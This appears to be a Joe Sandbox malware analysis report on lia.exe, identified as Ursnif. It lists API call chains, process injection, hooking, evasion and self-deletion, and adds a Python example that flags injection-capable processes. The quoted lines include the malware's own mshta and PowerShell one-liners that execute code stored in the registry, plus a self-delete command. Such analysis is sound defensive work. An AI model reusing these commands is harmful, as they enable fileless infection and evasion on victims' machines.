Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D1641 memset,NtQueryInformationProcess, 1_2_039D1641
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D155B NtQuerySystemInformation,RtlNtStatusToDosError, 1_2_039D155B
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039F389B NtGetContextThread,RtlNtStatusToDosError, 1_2_039F389B
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039EE4D5 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 1_2_039EE4D5
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D483A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_039D483A
Source: C:\Windows\System32\control.exe Code function: 18_2_00526140 NtAllocateVirtualMemory, 18_2_00526140
Source: C:\Windows\System32\control.exe Code function: 18_2_00539994 NtReadVirtualMemory, 18_2_00539994
Source: C:\Windows\System32\control.exe Code function: 18_2_00521B84 NtQueryInformationProcess, 18_2_00521B84
Source: C:\Windows\System32\control.exe Code function: 18_2_0053AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose, 18_2_0053AC44
Source: C:\Windows\System32\control.exe Code function: 18_2_00543C1C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 18_2_00543C1C
Source: C:\Windows\System32\control.exe Code function: 18_2_0054B58C NtSetContextThread,NtUnmapViewOfSection,NtClose, 18_2_0054B58C
Source: C:\Windows\System32\control.exe Code function: 18_2_00540E70 NtMapViewOfSection, 18_2_00540E70
Source: C:\Windows\System32\control.exe Code function: 18_2_0052E614 NtCreateSection, 18_2_0052E614
Source: C:\Windows\System32\control.exe Code function: 18_2_0052FF60 RtlAllocateHeap,NtQueryInformationProcess, 18_2_0052FF60
Source: C:\Windows\System32\control.exe Code function: 18_2_00521FBC NtWriteVirtualMemory, 18_2_00521FBC
Source: C:\Windows\System32\control.exe Code function: 18_2_0055F003 NtProtectVirtualMemory,NtProtectVirtualMemory, 18_2_0055F003
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47E1B84 NtQueryInformationProcess, 34_2_00000215F47E1B84
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47FAC44 NtQueryInformationToken,NtQueryInformationToken,NtClose, 34_2_00000215F47FAC44
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F481F003 NtProtectVirtualMemory,NtProtectVirtualMemory, 34_2_00000215F481F003
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036BD274 NtQueryInformationProcess, 44_2_036BD274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036D1AE3 memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 44_2_036D1AE3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036D29E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 44_2_036D29E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036C7523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 44_2_036C7523
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036B1641 memset,NtQueryInformationProcess, 44_2_036B1641
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036C7EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 44_2_036C7EEF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036B155B NtQuerySystemInformation,RtlNtStatusToDosError, 44_2_036B155B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036CE4D5 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 44_2_036CE4D5
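The "Code function" lines above record the native API chain each analysed function calls, and it is the co-occurrence of section creation and mapping (NtCreateSection, NtMapViewOfSection), writes into remote memory (NtAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory) and thread-context manipulation (NtGetContextThread, NtSetContextThread, CreateRemoteThread, QueueUserAPC) that the injection signatures in this report rest on. The Python below is an added example, not part of the Joe Sandbox report: it parses an excerpt of those lines copied from this page and groups the native calls seen in each process image into injection-primitive categories. The category names, the set of APIs in each, and the threshold of three categories are the example's own choices, not the sandbox's scoring.

```python
import re
from collections import defaultdict

# Constructed excerpt: "Code function" lines copied from this report. Format is
# "<proc>_<dump>_<va> <api>,<api>,... <proc>_<dump>_<va>", where the leading
# number is the sandbox's process index (1 = lia.exe, 18 = control.exe,
# 34 = rundll32.exe, 44 = cmd.exe). Lines without an API list also occur.
REPORT_EXCERPT = r"""
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_0040182F GetProcAddress,NtCreateSection,memset, 1_2_0040182F
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00401ABC NtMapViewOfSection, 1_2_00401ABC
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039EB38D memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 1_2_039EB38D
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039E2931 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_039E2931
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D317C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_039D317C
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D483A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_039D483A
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D76E3 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_039D76E3
Source: C:\Windows\System32\control.exe Code function: 18_2_0054AB44 18_2_0054AB44
Source: C:\Windows\System32\control.exe Code function: 18_2_00526140 NtAllocateVirtualMemory, 18_2_00526140
Source: C:\Windows\System32\control.exe Code function: 18_2_00543C1C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 18_2_00543C1C
Source: C:\Windows\System32\control.exe Code function: 18_2_0054B58C NtSetContextThread,NtUnmapViewOfSection,NtClose, 18_2_0054B58C
Source: C:\Windows\System32\control.exe Code function: 18_2_00540E70 NtMapViewOfSection, 18_2_00540E70
Source: C:\Windows\System32\control.exe Code function: 18_2_0052E614 NtCreateSection, 18_2_0052E614
Source: C:\Windows\System32\control.exe Code function: 18_2_00521FBC NtWriteVirtualMemory, 18_2_00521FBC
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F481F003 NtProtectVirtualMemory,NtProtectVirtualMemory, 34_2_00000215F481F003
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F47E1B84 NtQueryInformationProcess, 34_2_00000215F47E1B84
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036BD274 NtQueryInformationProcess, 44_2_036BD274
"""

# image path, function id, optional comma-separated API list, function id repeated
LINE_RE = re.compile(
    r"^Source: (?P<image>.+?) Code function: (?P<fid>\d+_\d+_[0-9A-F]+)"
    r"(?: (?P<apis>[\w,]+))? (?P=fid)$"
)

# Example's own grouping of native calls into injection primitives (assumption,
# not the sandbox's taxonomy).
PRIMITIVES = {
    "section_mapping": {"NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"},
    "remote_memory": {"NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtProtectVirtualMemory"},
    "thread_control": {"NtGetContextThread", "NtSetContextThread", "CreateRemoteThread", "QueueUserAPC"},
    "wow64_bridge": {"NtWow64QueryInformationProcess64", "NtWow64ReadVirtualMemory64"},
}


def parse_code_functions(text):
    """Turn report lines into {image, fid, apis} records; skips anything that is not a code-function line."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        apis = [a for a in (m["apis"] or "").split(",") if a]
        records.append({"image": m["image"], "fid": m["fid"], "apis": apis})
    return records


def categorize(records):
    """Map each image to {primitive category: set of the APIs that triggered it}."""
    summary = defaultdict(lambda: defaultdict(set))
    for rec in records:
        for category, names in PRIMITIVES.items():
            hits = names.intersection(rec["apis"])
            if hits:
                summary[rec["image"]][category].update(hits)
    return summary


def flag_injectors(text, threshold=3):
    """Images whose code hits at least `threshold` primitive categories, sorted by path."""
    summary = categorize(parse_code_functions(text))
    return sorted(img for img, cats in summary.items() if len(cats) >= threshold)


if __name__ == "__main__":
    for img, cats in categorize(parse_code_functions(REPORT_EXCERPT)).items():
        print(img, {c: sorted(a) for c, a in cats.items()})
    print("injection-capable:", flag_injectors(REPORT_EXCERPT))
```

On this excerpt lia.exe hits all four categories and control.exe three, which matches the report's picture of lia.exe injecting into control.exe and control.exe carrying the same loader forward; rundll32.exe only shows memory-protection changes and cmd.exe none of the primitives, so a threshold of three separates the two stagers from the processes that merely host injected code.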
Sample file is different than original file name gathered from version info
Source: lia.exe, 00000001.00000003.469621415.0000000004144000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs lia.exe
Source: lia.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220112
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winEXE@34/19@9/2
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: lia.exe Virustotal: Detection: 64%
Source: lia.exe ReversingLabs: Detection: 74%
Source: C:\Users\user\Desktop\lia.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\lia.exe "C:\Users\user\Desktop\lia.exe"
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES533B.tmp" "c:\Users\user\AppData\Local\Temp\vjag4cgm\CSC876E17C1D4FA4A478F85FCB91E435E.TMP"
Source: C:\Users\user\Desktop\lia.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES771E.tmp" "c:\Users\user\AppData\Local\Temp\wvnfnueh\CSCD2B2FCBE1BFD4A96A519A01DF502239.TMP"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6AF4.bi1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\6AF4.bi1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\backgroundTaskHost.exe "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lia.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0usnm2v.qwh.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B11141 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 1_2_00B11141
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{52A61B79-8911-546D-A3A6-CDC8873A517C}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1080:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:804:120:WilError_01
Source: C:\Windows\SysWOW64\cmd.exe Mutant created: \Sessions\1\BaseNamedObjects\{8A03E515-611D-4C17-3B5E-25409F722974}
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{B69CECF8-9D6C-5805-D74A-210CFB1EE500}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3312:120:WilError_01
Source: C:\Users\user\Desktop\lia.exe Mutant created: \Sessions\1\BaseNamedObjects\{D2B9349F-090F-D44C-2326-4D4807BAD1FC}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4844:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{6A55D138-C185-2CA4-9B3E-8520FF528954}
Source: C:\Users\user\Desktop\lia.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: ntdll.pdb source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.pdb source: powershell.exe, 0000000C.00000002.614202751.000001770375D000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B1B6BE push ebp; retf 1_2_00B1B6BF
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B1B804 push 00000055h; iretd 1_2_00B1B808
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B17BE0 push ecx; ret 1_2_00B17BE9
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B1B72E push ecx; ret 1_2_00B1B734
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B17F4F push ecx; ret 1_2_00B17F5F
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039F541F push ecx; ret 1_2_039F542F
Source: C:\Windows\System32\control.exe Code function: 18_2_005472FD push 3B000001h; retf 18_2_00547302
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000215F48072FD push 3B000001h; retf 34_2_00000215F4807302
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036D5070 push ecx; ret 44_2_036D5079
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036D3D42 push ss; ret 44_2_036D3D43
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036D541F push ecx; ret 44_2_036D542F
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_004012E6 LoadLibraryA,GetProcAddress, 1_2_004012E6
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Self deletion via cmd delete
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\lia.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\lia.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\lia.exe TID: 6364 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068 Thread sleep time: -6456360425798339s >= -30000s
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\lia.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\cmd.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5398
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3959
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\cmd.exe API coverage: 3.9 %
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039E8409 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_039E8409
Source: explorer.exe, 00000016.00000000.508063004.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000016.00000000.506696613.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: RuntimeBroker.exe, 00000021.00000000.563490355.0000021DB5A53000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000016.00000000.506696613.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000016.00000000.542857487.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
